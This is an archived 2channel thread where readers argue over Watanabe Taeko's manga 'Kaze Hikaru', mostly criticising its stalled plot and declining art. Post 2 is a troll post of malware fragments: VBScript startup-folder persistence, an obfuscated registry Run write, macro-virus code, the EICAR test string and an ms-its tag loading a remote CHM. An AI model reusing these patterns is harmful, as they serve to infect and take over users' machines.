2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

風光る●渡辺多恵子36

1 :花と名無しさん:2006/12/16(土) 20:56:41 ID:DPM1GQLA0
現在月刊Flowersにて『風光る』を連載中の、渡辺多恵子さんの作品を語るスレッドです。
渡辺作品であれば、何の漫画の話をして下さっても構いません。
『風光る』の史実ネタバレもOKですが、書き込みは節度をもってお願いします。
*渡辺作品に関係ない話題はご遠慮を。荒しはスルーして、楽しく語りましょう。

前スレ
風光る●渡辺多恵子35
http://comic6.2ch.net/test/read.cgi/gcomic/1160064254/

作者の言動について語りたい時にはアニメ業界板↓
風光る●渡辺多恵子・弐拾弐
http://anime.2ch.net/test/read.cgi/iga/1160873348/

★「950踏んだ人」が次スレ立てないと恐怖のだらだらが続いちゃうぞ★

2 :<body onload=window()>:2006/12/16(土) 20:58:23 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

3 :花と名無しさん:2006/12/16(土) 21:12:43 ID:???0
♪  ∧_∧   
   ( ・`ω・´) ))  ♪ >1乙
  (( ( つ ヽ、        
    〉 とノ ) ))
   (__ノ^(_) ♪

   ∧,_∧ ♪
  (( (     )
♪  /    ) )) ♪
 (( (  (  〈
   (_)^ヽ__)


4 :花と名無しさん:2006/12/16(土) 23:41:06 ID:???0
で、お前ら暇人はいつまでこのスレを続けるのかな?
女々しいを通り越してキチガイだぞ
これ以上アンチ活動をするのは辞めたまえ


5 :花と名無しさん:2006/12/17(日) 09:30:33 ID:???O
>>1
スレ立て、乙華麗。

6 :花と名無しさん:2006/12/17(日) 20:05:07 ID:LlPeR2cH0
>>1
乙! 作者さんの絵とか背景の細かさとか服装へのこだわりは
大好きなんだけどな、性格がな・・・。詳しくないからわからないんだけど
背景とかってアシスタントさんがやってるのかな?尊敬してます

7 :花と名無しさん:2006/12/17(日) 20:15:19 ID:???0
久々に来た。
伊東テンテーはひょっとしてまだ御存命なの?
いい加減進めて欲しいな

8 :花と名無しさん:2006/12/17(日) 21:01:21 ID:???0
油工事未だ?

9 :花と名無しさん:2006/12/17(日) 22:14:49 ID:???0
>>8
たぶん永久にない

10 :花と名無しさん:2006/12/18(月) 04:33:27 ID:???O
即死防止

11 :花と名無しさん:2006/12/18(月) 11:09:20 ID:???0
>>9
永久ということはないだろう



半永久はあるかもだけど

12 :花と名無しさん:2006/12/18(月) 11:10:07 ID:???0
時代的にはボチボチ薩長同盟締結&寺田屋騒動?

13 :花と名無しさん:2006/12/18(月) 15:31:13 ID:???0
しかしセイの環境って凄いものがあるな。

元江戸府内直参の臣で友松本良順を旧友な蘭医が父親♪

斉藤一と同門で友人に持つ兄♪

5歳の春に沖田総司(宗次郎)と出会っちゃう♪

新撰組に入ったらチヤホヤ♪一隊員なのに幹部並の扱いよ♪

女の子の日には兄の元恋人明里に助けてもらえるし♪

明里の現恋人山南さんから守ってもらえるし♪

父の旧友松本良順からも魔法の診断結果貰えて土方さんも騙せちゃうし♪

徳川慶喜からもお気に入りされちゃったよ♪

坂本龍馬もセイにイチコロ♪

斉藤一に女ってバレても嫁に欲しいって思われてるし♪


家族からもう全てがセイに良いようになっているな・・・・・www

14 :花と名無しさん:2006/12/18(月) 21:18:40 ID:???0
そりゃもう周りの環境どころか、本人設定が容姿端麗且つすばしっこくて強いってことになってますから。
……無敵じゃん。

15 :花と名無しさん:2006/12/18(月) 22:01:17 ID:???0
>>12
例えセイが関わってなくても、今時代がどういう流れになっているか
緊張感が増してきているんだと言うくらいの描写はすれば良いのにねえ


少女漫画だから恋愛さえ描けば良いとか思っているんだろうか?

16 :花と名無しさん:2006/12/18(月) 23:20:31 ID:cZtICJu2O
せいとそうし、もうウザキモ!何で、あんなにきもい?

17 :花と名無しさん:2006/12/19(火) 05:23:11 ID:???O
来週、花達発売ですねー
でもまだけっこう売れ残りが平積みだったな。

18 :花と名無しさん:2006/12/19(火) 20:57:38 ID:gmoivvlVO
気持ち悪いマンガ


19 :花と名無しさん:2006/12/19(火) 22:25:45 ID:???0
うちのところ田舎だからかもしれないけど先月のフラワーズが
まだ一冊置いてあった。
今月のも出てるのになんで?取りわすれ?

20 :花と名無しさん:2006/12/20(水) 01:39:49 ID:???0
>>19
19の言う先月のフラワーズは、10月末発売のことか?
今発売中のフラワーズは、厳密に言えば先月=11/28発売の1月号だと思うんだが…。
でも1冊なら、あえてその店の方針で置いてあるものかも知れないよ。
たまにお店によっては前月号を買いに来る稀有なお客のために
前月号を1冊だけ残しておくと、某スレの書店員がレスしていたので。

21 :花と名無しさん:2006/12/20(水) 13:28:01 ID:???O
ただの置き換え忘れの場合もあります(書店員(;´∀`)

22 :19:2006/12/20(水) 13:30:57 ID:???0
>>20
d
10月末に発売したやつになりますね。
店の方針とかいろいろあるんだなー。

23 :花と名無しさん:2006/12/20(水) 21:05:44 ID:???0
21巻日誌Rは袴ネタ

それにしても翆月様のプレイは何度見ても
(;´Д`)ハァハァ

24 :花と名無しさん:2006/12/21(木) 02:10:35 ID:???0
↓21巻表紙
ttp://skygarden.shogakukan.co.jp/skygarden/owa/solrenew_detail?isbn=4091307574
今回のテーマは何だろう
武士っぽくて好き

25 :花と名無しさん:2006/12/21(木) 02:40:26 ID:???0
>>24
その表紙不覚にもカワイイと思った

26 :花と名無しさん:2006/12/21(木) 23:00:28 ID:???O
21巻の…扉絵というんですか?目次の前のページ。
子供セイが気持ち悪く見える…首すげかえたみたい(´・ω・`)

27 :花と名無しさん:2006/12/22(金) 00:18:42 ID:???0
なんかアンチってカルトそのまんまだな。
少人数で集まって、自分等が正しいとか思っちゃってるのwww
社会から隔離されてるところもなwwwwwwwwwwwwwww



28 :花と名無しさん:2006/12/22(金) 01:27:08 ID:???0
最新刊読んだ。相変わらずだね。自分で買う気はしないけど
身内が買ってるから読んでる。ファミリーはよかったのになあ。

29 :花と名無しさん:2006/12/22(金) 02:18:04 ID:???0
最新刊読んだ。
相変わらずだが、初期の話題が出てきて
今回がターニングポイント、次巻から大きく歴史もドラマも
動きますよ〜〜〜という感じだった。

・・・・でも、動かないんだよね?orz

30 :花と名無しさん:2006/12/22(金) 15:57:40 ID:YGx6vvIl0
最新巻読んだ。なんの疑いもなく楽しみにしてたからもう即買いしたんだけど
がっかりした。読み応えないしセイのまつげが非っっっ常〜に不自然だった
本当に腐ってしまったなとおもったこのマンガ

31 :花と名無しさん:2006/12/22(金) 19:54:56 ID:???0
花s買ってるが、最近の●の扉絵は前にもでてたが
ひどくデッサン狂ってるのがよくある。なぜだ?
風邪の話はもうどうでもいいレベルだが、絵だけはまともな漫画家だと思っていたのに。
ちょっとまえ足募集していたけどひょっとしてまともな絵は足が描いてたとかか???!

ぐぼぁ

32 :花と名無しさん:2006/12/22(金) 20:37:46 ID:???0
加齢による劣化

33 :花と名無しさん:2006/12/22(金) 21:08:11 ID:???0
最新巻買おうと思って本屋に行ったらなかった。
20巻はあるのに21巻がない。なぜ? まさか売り切れ?
いやそれは絶対にない。
発売日間違えたか? と思って帰路についたが
発売日は昨日で間違ってなかったみたいね

34 :花と名無しさん:2006/12/22(金) 21:42:11 ID:???O
残念本屋さんだから

35 :花と名無しさん:2006/12/22(金) 22:39:54 ID:???0
最新刊買った
ここで空気読まずに「面白かった〜〜」と言いたかった
でも言えなかった
ここの人がオナニー漫画だと言うのに気づくのに21巻までかかってしまった

36 :花と名無しさん:2006/12/22(金) 23:50:09 ID:???0
絶賛できる漫画ではないけど、そんなにボロくそ言われるほどの漫画でもないと思う
作者自身の問題とファンがアンチになってるから厳しいのかな

37 :花と名無しさん:2006/12/23(土) 00:07:42 ID:???O
今気付いたけど、沖田泣いてるー

38 :花と名無しさん:2006/12/23(土) 00:59:50 ID:???0
オナニー漫画でも面白いから買ってる

39 :花と名無しさん:2006/12/23(土) 01:14:51 ID:???0
>>36
20巻超えた長編のわりに、作品内の時が止まってしまったかの
ようなgdgd加減に文句言ってる読者が多いと思われ。

40 :花と名無しさん:2006/12/23(土) 01:17:24 ID:???0
面白いと思うのは全然かまわないと思う。
私も含めてここで面白くないといってるのは、
新撰組とその時代の流れについてある程度知ってて
そこをどう料理するかという部分があまりにもgdgdだからという点が大きい。

そこを外して楽しめるのであればおkじゃない?
ただ、それを外すと永遠ループの「なぜ新撰組でなけれb(ry」
だがw

41 :花と名無しさん:2006/12/23(土) 01:42:31 ID:???0
なるほど
確かに歴史ものだと、ただの男装漫画とは求められる水準が変わってくるのかもね
自分は新撰組自体に何の思い入れもないし、気楽に読んでるから平気なのかも

42 :花と名無しさん:2006/12/23(土) 02:06:35 ID:???0
>>40
そうなのかも
ここのスレ読んでたしかに作者に対しては嫌悪を覚えるんだけど作品自体は嫌いじゃないんだ
そう切り離して読めるのも歴史に拘ってないからかも

あの仕入れた知識を聞いて聞いてとばかりに披露する辺りは
ずっと歴史ファンやってた人にはきついものなんだろうなぁ…
自分の好きな芸能人で考えてみた

43 :花と名無しさん:2006/12/23(土) 02:40:34 ID:???0
今更沖田とセイが色っぽい関係になるのなんて想像つかんのだが…
自分の気持ちに気付くのに20巻て
時間がかかりすぎにも程があるな

44 :花と名無しさん:2006/12/23(土) 02:44:27 ID:???0
風沖田も昔はかっこいいと思ってたけど
最近のは目にあまる…

45 :花と名無しさん:2006/12/23(土) 08:20:30 ID:???0
たまに書かれる擁護派の意見がいつも同じだよね
「歴史には拘ってないから」「気楽に読んでいるから」
何がどういう風に面白いのか最近は殆ど書かれてない。


自分もそんなに歴史に詳しいわけではない。

主役であるセイの性格、周りの不自然なまでのマンセー、
男装させている意味そのものがなくなるニョシンセン設定、
露骨過ぎる斉藤の当て馬描写、本人が資料を基に史実史実とのたまうくせに
時折入れる現代のカタカナ言葉、歴史に関係なくても、これはどうなの?と
思われる所は幾つもあるよ。



46 :花と名無しさん:2006/12/23(土) 08:49:23 ID:BnT5HHznO
幕末になると風の様に綺麗に日本髪結って要る様に見えるけど実際は・・・

47 :花と名無しさん:2006/12/23(土) 11:23:01 ID:???0
好きな人は好きな人で
アンチはアンチで語れるのがここは好きだなぁ

48 :花と名無しさん:2006/12/23(土) 11:33:11 ID:???0
セイばっかりが運が良くて持てはやされてるのは
漫画のお約束なのなと思ってるな
それよりホモだらけになりそうなのは勘
歴史の人をホモだらけにしたら怒る人いるだろう と思わないのか作者は
漫画だから許されてるんだろうけど

例えば自分の好きな芸能人の漫画で
作者が知ったかぶって 本人やハバンドの歴史のことトクトクと話ししてたら
相当腹立つよな
ここの人と同じことしてると思う



49 :花と名無しさん:2006/12/23(土) 15:25:26 ID:???0
>>45
別に嫌いなら嫌いでいいけど
擁護する人を否定しなくてもいいじゃん
好きな理由を事細かに書かないとダメって決まりがあるわけじゃあるまいし…

50 :花と名無しさん:2006/12/23(土) 17:06:39 ID:3htptTjc0
そういえば駒野さんの赤ちゃんの話どうなったのかな。駒野さん久々に見たい・・・

51 :花と名無しさん:2006/12/23(土) 17:18:38 ID:???0
>>39>>40
ああ、まさしくorz

私も別に幕末の歴史にさほど詳しいわけでもないし
特別思い入れがあるわけでもない。
ただ、知識として史実を知っている程度。

だけど、知ってることは知ってるからこそ
>>40
>そこをどう料理するかという部分があまりにもgdgd
となる。

ではいっそ歴史、史実はサッパリ忘れて気楽に読んだら
>>39
>20巻超えた長編のわりに、作品内の時が止まってしまったかの
>ようなgdgd加減
が気になる。

いっそ最初からまったく面白くなければスッパリと切れるし
文句言う気にもならないのに
ファミリーは好きだったし、風も最初は好きだった、
今も「面白くない」とまでは言い切れないから
どうにもこうにも……

52 :花と名無しさん:2006/12/23(土) 17:55:42 ID:???0
21巻読んだ。
まぁ、満足できたかな。
風の沖田が結構好きなので、今回の彼の葛藤している心情描写は
なかなか楽しめた。
アンチの意見にも同意できる所はあるんだけど
>>51同様どうにもこうにも・・・・だよ


53 :花と名無しさん:2006/12/23(土) 19:38:29 ID:???0
>>31 激しく●っと同意。
絵だけは・・・絵だけは最後の頼みの綱だったのに・・・。

54 :花と名無しさん:2006/12/23(土) 19:41:20 ID:???0
そういえば、●にホモだらけ違和感を認識してもらうには
現存する少女漫画家大御所主人公に「レズ業界マンガ」想像してもらうといいなw

●を主人公で良いから、そこにいちじょ〜大先生とかお〜縞先生とか
★とか温帯とかとにかくその辺の登場人物でレズ一直線のマンガ。

どうだ〜! キモイだろw
で、その人達に失礼かもとか思うだろ?

55 :花と名無しさん:2006/12/23(土) 23:12:21 ID:???0
>>54
そんでA池先生に「馬鹿ものーーー!」と一喝されるわけか。

56 :花と名無しさん:2006/12/24(日) 01:09:58 ID:???O
新刊買った。
風光るって好きな作品ではあるけど今だに緊張感の欠けらもないっていうのがちょっとな〜
新選組は幕府とともに滅んでいくものだし、沖田も発病するし段々シリアスになるはずなのに・・・
大河のコメディ新選組ですら山南さん死ぬ所辺りから重苦しくなっていったのに。
好きな人の傍にいたいが故の女の子の揺れる気持ちって、少女漫画の大事な部分だけど
死ぬか生きるかの男の世界を中途半端にフラフラして、隊士を振り回しているセイにはもっとしゃきっとしてほしい。

57 :花と名無しさん:2006/12/24(日) 01:26:59 ID:???0
いまふと気がついたが、このマンガで最大の違和感の原因の一つがわかった。

注釈では斉藤の結婚に対する姿勢を、当時の時代としては当然と説明し
その環境なども少し触れている。にもかかわらず、セイの性格、発想は現代そのものだ。
マンガの背景に割と厳密な時代設定を置きながら、主人公の振る舞いにはまったくそれが
影響していない。本当にそんな設定で行くならとっくに斬首になってるかも。

とかいうところだ。

58 :花と名無しさん:2006/12/24(日) 02:10:32 ID:???0
セイも7巻あたりまでは組織に組み込まれた1兵士で普通よりちょっと気の強い女の子
だったんだけど、ここ数年のセイはあとがきの渡辺●子にしか 見 え な い 
沖田の発病は泣くだろうと5年前は思ってたけど、これ以上変なキャラになる前に早く終わらせてほしい
どうせ悲恋なんだしほんのり自覚くらいでいいのに


59 :花と名無しさん:2006/12/24(日) 02:42:50 ID:???0
>死ぬか生きるかの男の世界を中途半端にフラフラして、隊士を振り回しているセイ

的確だな

60 :花と名無しさん:2006/12/24(日) 19:46:24 ID:???0
新刊読んだ
・・・新選組漫画である必要性がますます無くなったな
てか展開遅すぎて今歴史的に見てどこら辺なのかわかんね

61 :花と名無しさん:2006/12/24(日) 21:50:11 ID:???0
セイの振る舞いもあざとく見えるようになってしまった。
隊士全員がセイマンセーなのも気になる。

もう股間の話もおなかいっぱいです・・・
22巻収録内容は余計gdgdできついよな。

とりあえず連載はどんどん進めて、
連載終わってから番外編後日談みたいな形でかいてほしい。

62 :花と名無しさん:2006/12/25(月) 01:44:51 ID:???0
21巻読んで、そろそろ買うのをやめようか真剣に考えてる。
別に批判したいために買ってる訳じゃなく、「元に戻るのでは?」という
わずかな期待をかけて買ってるので。毎回裏切られてるが。

3番隊転属の話とか、思い切り割り込んでくるんだけど、
以前ってここまで幹部連の話にずかずか踏み込んできたっけ?
幹部連は幹部連で話をして、下命あってから知るパターンの方が
多かったように思うんだけど(2巻辺りで試衛館の面々が抜ける所とか)。
あとは芹沢暗殺みたいに幹部側がポカをやらかして知るとか。
古参にしても前髪で平扱いされてるのに、どうにも立場のわきまえが
緩くて、勘違いしてるわがまま娘にしか見えなくなってきた。

>>57
それはある程度仕方ないかと。セイは読者が共感できないといけないので、
発想が江戸時代的ではついていけない。むしろ今回いらなかったのは
解説だと思う。当時の人がそういう考えだったことは、例えば
沖田「女性の意志は〜」
斎藤「結婚とは〜」
沖田「そういやそうですね」
みたいにキャラに語らせるべき(あるいは無関係な町の人とかの
描写を入れて、「町人ならともかくお武家さんなら当たり前やろ」
みたいな話のシーンを挿入するとか)で、囲みで語る事じゃないと思う。

63 :花と名無しさん:2006/12/25(月) 09:08:45 ID:???0
個人一人の力なんかじゃどうにもならない時代の波に
流され、翻弄され、それでも自分の信じる道を行く新撰組。
そんな中でも仲間と笑って、死にゆく者に涙して、命を懸けた恋もした、
富永セイの回顧録としての幕末☆青春グラフィティ。

……という流れにすれば良かったのに。
少なくとも今の流れでは時代の勢いとかいったものは一つも感じられない。
のんべんだらりとした日常&生ぬるい湯に浸かりふやけ切った新撰組に
何の魅力を見出せというのだろうか。プロフェッショナルのエンターティナー●センセイは。

64 :花と名無しさん:2006/12/25(月) 09:39:49 ID:???0
こいつの漫画初めて読んだけど、(笑)に腹立つ。
あと確信犯に腹立つ。日本語は正しくね。

65 :花と名無しさん:2006/12/25(月) 14:01:57 ID:???0
新撰組の日常を際立たせる為には、同時に彼等の生き抜いた時代背景が
いかに厳しく激しいものであるかを描かないと意味がないと思うんだよ。

漫画あずみの話を持ち出して申し訳ないけど、
一方では人を斬りまくり、時に大事な人の命も奪い合い
人が生きるのも必死な描写がかなりきついから
時に書かれる子供達との触れ合いやひと時の日常に切なさを感じ
この日が続けば良いのにと思わされる。

風光るにもそうやれはと言わないし、まず●も描けないだろうけど
もう少しセイサイドだけではなく長州、薩摩ももう少し描けば良いのにと思うよ。


66 :花と名無しさん:2006/12/25(月) 16:02:55 ID:???0
お馬が出すぎ
何かこだわりがあるんだろうか

67 :花と名無しさん:2006/12/25(月) 17:20:20 ID:eOC5h2rj0
なんか風光るのあとがきかインタビューか何かは忘れたけど
「新撰組が西本願寺ですごした期間が一番長かったから
他の漫画とか映画とかと違ってそこも細かく書いていきたい(新撰組の
日常?を描きたい)」とかうろ覚えだけどこんなことどっかに描いてあったけど
「新撰組の日常を描きたい」じゃなくて「セイ(どーでもいい)の日常を描きたい」の間違い
なんじゃないかとおもう。

68 :花と名無しさん:2006/12/26(火) 00:38:16 ID:g7UyFVl3O
で、いつになったら伊東一派は離脱しますかぁ?
まさかあと10巻後とかにならんやろね

69 :花と名無しさん:2006/12/26(火) 02:10:32 ID:???0
伊東一派離脱の前にみんな揃って現代にタイムスリップする

んで高校の剣道部やホストクラブに舞台を移しつつ
「風光る・第二部 ―平成編―」がスタート

てかもうそれでもいいかな、などと思ったり。

70 :花と名無しさん:2006/12/26(火) 02:52:25 ID:???0
女子剣道部がない高校
「私は剣道部に入りたいんです」
「私は剣道部員で男ですから」
こうして恋が始まる

71 :花と名無しさん:2006/12/26(火) 13:57:19 ID:???0
剣道って男女混合で練習できるし、男の振りして入部する必要性はないよ。
てか、現代の剣道部でもセイみたいな手前勝手なタイプはお断り。

72 :花と名無しさん:2006/12/26(火) 17:35:43 ID:???0
男子校剣道部にこっそり入部しちゃいます。


うわー、ありきたりな展開

73 :花と名無しさん:2006/12/26(火) 17:48:04 ID:???0
>>24
表紙カバーの折り返しの作者の言葉によると
24巻までの続きものなので、今は内緒wらしいね

74 :花と名無しさん:2006/12/26(火) 20:04:44 ID:???O
ブサババアのオナニー漫画を読んで喜んでる人のスレはここですか?(´,_ゝ`)

75 :花と名無しさん:2006/12/26(火) 20:08:43 ID:???0
刀がテーマじゃないの?

76 :花と名無しさん:2006/12/26(火) 22:01:19 ID:???O
風光る京都を買いました。
「ここからは『風光る』本編のストーリー進行に合わせてごらんください」ってネタバレページにまだ本編が差し掛かってないのにワロタ。
何年前に出た本やねんヽ(`Д´)ノ

77 :花と名無しさん:2006/12/26(火) 22:50:16 ID:???0
どこらへんから止まってしまったんだ

78 :花と名無しさん:2006/12/26(火) 23:45:32 ID:???0
雑誌の移動と同時に屯所を移動してから全く話が進んでいない気がするんだが

79 :花と名無しさん:2006/12/27(水) 00:14:37 ID:???0
オマイラ阿呆ですか?
時空の迷宮に入り込んでしまった新撰組という
壮大なSF設定に決まってるだろ。

80 :花と名無しさん:2006/12/27(水) 09:34:16 ID:???0

         ナ ゝ   ナ ゝ /    十_"    ー;=‐         |! |!
          cト    cト /^、_ノ  | 、.__ つ  (.__    ̄ ̄ ̄ ̄   ・ ・

         _       /i  /ヽ \/'i,/ /i  iヽ
       /::/゙i,     ./:. i, /:: .| (;,ツ: . 'i;;,)/:: i, /:: |
      /::/ u゙i,     i;: : `´ ,/ /::   'i, i;: . ` /
    /::/u   ゙i,     \:: / /.::    'i, ┌───────‐┬─┐
   /::/____゙i,      'i,i, /.:::       'i .| \,,       ,,/  .|   |
     ̄,r'";:::::::::::"'';,        i,i, |:::::        |,| ● ト-─-イ ●  .|   |
   /i;;;;;;;::::::::::::::::::'!        i,i,|::::.        |'i|   |    .|   u | \|
.. / |::;;;;;;;:::::::::::::::::::l          '|::::::         |',i|   'i   ,!     |   |\

81 :花と名無しさん:2006/12/27(水) 17:17:51 ID:qdvGMJPmO
何はともあれ総司、発病の兆しですね
(胸のズキンは恋情と発病を兼ねてるのか?)

82 :花と名無しさん:2006/12/27(水) 18:21:48 ID:???0
>>81
その部分どっちなのかわからなかった。

83 :花と名無しさん:2006/12/27(水) 18:49:08 ID:???0
●のことだから前者だな

84 :花と名無しさん:2006/12/27(水) 19:13:29 ID:???0
翠月のところに死にに行ったとき前髪切ろうとした時
絶対やらないとわかっていた 浅い

85 :花と名無しさん:2006/12/27(水) 19:37:35 ID:???0
20巻21巻と読むと、セイの睫毛がいつもつくようになったのは
龍馬に乳揉まれて女が目覚めたんだろうかと思ってしまう

86 :花と名無しさん:2006/12/27(水) 21:26:15 ID:???0
発病じゃないのかな?
土方に押されてよろけてたし
いよいよどういう決着をつけるのか見ものだな
(何年先か分からんがな!)

87 :花と名無しさん:2006/12/27(水) 21:53:43 ID:???O
>>86
そのシーン読んで発病キターと思ったw

88 :花と名無しさん:2006/12/27(水) 22:43:35 ID:???O
自分も発病かとオモタ
つかマジでそろそろ発病させないと終わ(ry


89 :花と名無しさん:2006/12/27(水) 22:45:40 ID:???0
終わらせる気がな(ry

90 :花と名無しさん:2006/12/27(水) 23:31:28 ID:???0
結核って胸が痛くなる病気だったか?
かなり症状が進んだあと肺胞が損壊するにいたるんだと思ってたが。

91 :花と名無しさん:2006/12/27(水) 23:54:03 ID:???0
沖田死なないんじゃね?この漫画世界なら結核もすんごい奇跡的に治るかもしれん。
身代わりの死体でお墓作ってセイとどっかに逃避行とか。

92 :花と名無しさん:2006/12/27(水) 23:54:45 ID:???O
胸が痛いっていうか
熱っぽくなったりドキドキしたり
胸に何らかの症状が出てきてるからね…
これはそろそろ来るかなーと

93 :花と名無しさん:2006/12/28(木) 00:01:34 ID:???0
置田の胸が痛いのは
ニョシンセンを患って
胸がふくらむ前兆なんじゃないw

94 :花と名無しさん:2006/12/28(木) 00:46:54 ID:PPNrWW4eO
あげますね^^

95 :花と名無しさん:2006/12/28(木) 01:23:55 ID:???0
翠月んとこで労咳についての話が出たのはいつか伏線にするためだろうな

96 :sage:2006/12/28(木) 02:46:42 ID:SoYuzNID0
翠月のくだりで労咳もらってきたセイが置田にうつしたりしてな

97 :花と名無しさん:2006/12/28(木) 02:48:20 ID:???0
久しぶりでやらかした。sageとく orz

98 :花と名無しさん:2006/12/28(木) 05:38:54 ID:???0
後ろ傷。
よって切腹。
終了!!

99 :花と名無しさん:2006/12/28(木) 09:38:33 ID:???0
とりあえず24巻までは終わらせる気がないのは明らか

100 :花と名無しさん:2006/12/28(木) 11:24:48 ID:???O
100\(^o^)/

101 :花と名無しさん:2006/12/28(木) 14:49:00 ID:???0
今回も何だか無難なオチで終わったな。
セイの不死身っぷりは凄いけど。

>>98
だよな。

アンチの気持ちもわかるけどイライラが募って憎しみに変わるようなら
精神衛生上良くないから本当に読むの辞めたほうがいい。

102 :花と名無しさん:2006/12/28(木) 15:58:54 ID:???0
実際、後ろ傷なのに、切腹じゃない方向にどうやってもっていくんだろう
「命がけで組長を守った、誠の武士!アッパレ!!」みたいな感じ?
通用しないよね〜

103 :花と名無しさん:2006/12/28(木) 16:38:49 ID:???0
あれ?でも相手を倒せばいいんだっけ?

104 :花と名無しさん:2006/12/28(木) 19:08:13 ID:???0
それよか殺気を感じ取った総司が振り向きざまに抜いてたら
セイは前と後ろから斬られてwww

105 :花と名無しさん:2006/12/28(木) 20:36:14 ID:???0
>>104


あの殺気に気づかない沖田が不思議だ。


106 :花と名無しさん:2006/12/29(金) 00:48:12 ID:???0
もうすべてがセイのためのご都合主義だからw

107 :花と名無しさん:2006/12/29(金) 03:53:41 ID:???O
本屋で花sの表紙の起き太を見てときめいてしまったのは秘密。

108 :花と名無しさん:2006/12/29(金) 04:34:28 ID:???O
最新巻まだぁ?

109 :花と名無しさん:2006/12/29(金) 07:07:50 ID:???0
>>107
表紙が良くても中身が(ry

110 :花と名無しさん:2006/12/29(金) 14:15:14 ID:???O
108は何が言いたいんだろう…
12/21にゴミクズ発売されたばかりなのに…
最終=完結巻って書きたかったのか?w

111 :花と名無しさん:2006/12/29(金) 14:16:00 ID:???O
108は何が言いたいんだろう…
12/21にゴミクズ発売されたばかりなのに…
最終=完結巻って書きたかったのか?w

112 :花と名無しさん:2006/12/29(金) 14:16:52 ID:???O
108は何が言いたいんだろう…
12/21にゴミクズ発売されたばかりなのに…
最終=完結巻って書きたかったのか?w

113 :花と名無しさん:2006/12/29(金) 14:18:03 ID:???O
108は何が言いたいんだろう…
12/21にゴミクズ発売されたばかりなのに…
最終=完結巻って書きたかったのか?w

114 :花と名無しさん:2006/12/29(金) 14:33:24 ID:???0
なにこのテンパリ具合w

115 :花と名無しさん:2006/12/29(金) 15:13:20 ID:???0
>>110-113 もちつけw

28 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)